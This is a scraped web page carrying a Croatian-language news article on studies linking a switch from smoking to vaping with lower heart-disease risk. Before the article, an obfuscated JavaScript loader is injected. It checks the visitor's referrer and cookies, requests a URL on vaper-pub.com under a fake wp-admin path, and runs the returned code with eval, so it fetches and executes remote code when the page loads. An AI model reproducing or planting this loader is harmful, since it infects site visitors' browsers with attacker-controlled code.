;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Istraživanje: Prelazak s pušenja na vaping smanjuje rizik od srčanih bolesti za 34%

Nova otkrića u studiji objavljenoj u časopisu Circulation sugeriraju da pušači koji se prebace isključivo na vaping smanjuju rizik od srčanih bolesti za 34%.

Koristeći longitudinalni pristup, istraživački tim analizirao je podatke 32 000 odraslih korisnika duhana koji su sudjelovali u nacionalno reprezentativnoj Procjeni pušenja i zdravlja (PATH) u šestogodišnjem razdoblju od 2013. do 2019. Istraživači su procijenili obrasce pušenja i parenja, te ih zatim usporedili s učestalošću srčanih bolesti koje su sami prijavili, poput moždanog udara, srčanog udara i zatajenja srca.

Prikupljeni podaci pokazuju da u usporedbi s nepušačima, pušači imaju 1,8 puta veći rizik od srčanih bolesti. S tim u vezi, studija je zaključila da postoji značajna veza između pušenja i srčanih bolesti, ali ne i između e-cigareta i srčanih bolesti.

Poništavanje učinaka pušenja

S druge strane, druga nedavna studija pod naslovom “Poremećaj pušenja i kardiovaskularno zdravlje” izvijestila je da upotreba zapaljivih duhanskih proizvoda, bezdimnog duhana i elektroničkih sustava za isporuku nikotina povećava učestalost akutnih i kroničnih kardiovaskularnih bolesti. Istraživači su dodali da se ti štetni učinci mogu poništiti relativno brzo nakon prestanka pušenja.

U tu svrhu, istraživački tim preporučio je tradicionalnije metode za prestanak pušenja. “Preporučeni tretman za prestanak pušenja uključuje ponudu farmakoterapije, savjetovanje koje treba naglasiti brzo smanjenje rizika koje se događa nakon prestanka pušenja i odgovarajuće kontakte za praćenje.”

Iako je studija koja je prikupljala podatke od 175 546 ispitanika koji su sudjelovali u godišnjoj Anketi o nacionalnom zdravstvenom intervjuu između 2014. i 2019. otkrila da je svakodnevna upotreba e-cigareta bila povezana s većom učestalošću srčanog udara samo među ljudima koji su također trenutno pušili obične cigarete. Štoviše, nisu pronađeni dokazi o povećanom riziku među vaperima koji nikad nisu pušili.

Choose your Reaction!
Leave a Comment